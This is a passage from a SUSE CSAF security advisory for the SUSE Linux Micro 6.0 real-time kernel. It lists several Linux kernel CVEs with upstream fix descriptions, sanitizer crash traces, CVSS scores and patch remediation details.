net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71095",
"url": "https://www.suse.com/security/cve/CVE-2025-71095"
},
{
"category": "external",
"summary": "SUSE Bug 1256605 for CVE-2025-71095",
"url": "https://bugzilla.suse.com/1256605"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71095"
},
{
"cve": "CVE-2025-71096",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71096"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71096",
"url": "https://www.suse.com/security/cve/CVE-2025-71096"
},
{
"category": "external",
"summary": "SUSE Bug 1256606 for CVE-2025-71096",
"url": "https://bugzilla.suse.com/1256606"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71096"
},
{
"cve": "CVE-2025-71097",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71097"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: Fix reference count leak when using error routes with nexthop objects\n\nWhen a nexthop object is deleted, it is marked as dead and then\nfib_table_flush() is called to flush all the routes that are using the\ndead nexthop.\n\nThe current logic in fib_table_flush() is to only flush error routes\n(e.g., blackhole) when it is called as part of network namespace\ndismantle (i.e., with flush_all=true). Therefore, error routes are not\nflushed when their nexthop object is deleted:\n\n # ip link add name dummy1 up type dummy\n # ip nexthop add id 1 dev dummy1\n # ip route add 198.51.100.1/32 nhid 1\n # ip route add blackhole 198.51.100.2/32 nhid 1\n # ip nexthop del id 1\n # ip route show\n blackhole 198.51.100.2 nhid 1 dev dummy1\n\nAs such, they keep holding a reference on the nexthop object which in\nturn holds a reference on the nexthop device, resulting in a reference\ncount leak:\n\n # ip link del dev dummy1\n [ 70.516258] unregister_netdevice: waiting for dummy1 to become free. Usage count = 2\n\nFix by flushing error routes when their nexthop is marked as dead.\n\nIPv6 does not suffer from this problem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71097",
"url": "https://www.suse.com/security/cve/CVE-2025-71097"
},
{
"category": "external",
"summary": "SUSE Bug 1256607 for CVE-2025-71097",
"url": "https://bugzilla.suse.com/1256607"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71097"
},
{
"cve": "CVE-2025-71098",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71098"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-71100"
},
{
"cve": "CVE-2025-71104",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71104"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: x86: Fix VM hard lockup after prolonged inactivity with periodic HV timer\n\nWhen advancing the target expiration for the guest\u0027s APIC timer in periodic\nmode, set the expiration to \"now\" if the target expiration is in the past\n(similar to what is done in update_target_expiration()). Blindly adding\nthe period to the previous target expiration can result in KVM generating\na practically unbounded number of hrtimer IRQs due to programming an\nexpired timer over and over. In extreme scenarios, e.g. if userspace\npauses/suspends a VM for an extended duration, this can even cause hard\nlockups in the host.\n\nCurrently, the bug only affects Intel CPUs when using the hypervisor timer\n(HV timer), a.k.a. the VMX preemption timer. Unlike the software timer,\na.k.a. hrtimer, which KVM keeps running even on exits to userspace, the\nHV timer only runs while the guest is active. As a result, if the vCPU\ndoes not run for an extended duration, there will be 